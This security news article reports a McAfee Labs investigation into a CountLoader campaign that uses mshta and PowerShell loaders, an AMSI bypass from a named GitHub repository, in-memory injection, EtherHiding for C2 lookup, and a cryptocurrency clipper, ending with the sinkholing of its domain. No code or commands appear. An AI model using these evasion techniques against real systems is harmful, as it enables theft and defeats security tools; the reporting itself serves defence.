CountLoader Malware Weaponizes EtherHiding to Deploy Stealth Crypto Clippers

A sprawling cybercriminal operation has been intercepted, but not before thousands of machines were quietly infected by a highly evasive malware designed to hijack cryptocurrency transactions mid-clipboard.

A new investigation has revealed a highly sophisticated and multi-layered threat targeting cryptocurrency users. Recently, McAfee Labs has recently uncovered a large scale CountLoader campaign that uses multiple layers of obfuscation and staged payload delivery to evade detection and maintain persistence in infected systems.

The attackers behind this campaign are not relying on a single, easily detectable malicious file. Instead, they utilize a “Russian-doll” style infection process that unpacks itself entirely in the victim’s system memory.

The infection chain is a masterclass in modern evasion, relying on multiple stages of scripts and memory injection. The process begins with obfuscated JavaScript executed through legitimate Windows tools like mshta.exe, which then triggers a sequence of PowerShell loaders.

The malware acts as a simple packer whose “primary function is to decrypt and execute another PowerShell script”.

To ensure the final malicious payload can run undetected, the attackers actively sabotage Windows security features. “Before performing the injection, the script disables AMSI (Antimalware Scan Interface) using script from GitHub – S3cur3Th1sSh1t/Amsi-Bypass-Powershell,” the report noted. Once the system is blinded, the script injects shellcode directly into a legitimate running process, entirely avoiding the hard drive.

The ultimate goal of this elaborate, stealthy infrastructure is financial theft. The final payload deployed into memory is a “cryptocurrency clipper”. This malware silently monitors the victim’s clipboard. The moment a user copies a cryptocurrency wallet address to make a transaction, the malware swaps it out for an address controlled by the attackers, seamlessly redirecting the funds.

Adding to the sophistication is how the malware communicates with its operators. To avoid having their command-and-control (C2) servers easily blocked by security software, the attackers use a novel blockchain-based evasion tactic.

“It starts by fetching the C2 server address, which it gets by a technique called EtherHiding, where the C2 server address is fetched from Ethereum blockchain,” the researchers detailed.

Despite the advanced evasion techniques, McAfee researchers successfully disrupted the operation. By identifying and registering a backup domain hardcoded into the malware, the security team was able to “sinkhole” the malicious traffic.

This defensive technique redirected the compromised hosts away from the attackers and onto a researcher-controlled server, effectively neutralizing the immediate threat for those users while revealing the massive scale of the campaign—with thousands of infected machines phoning home.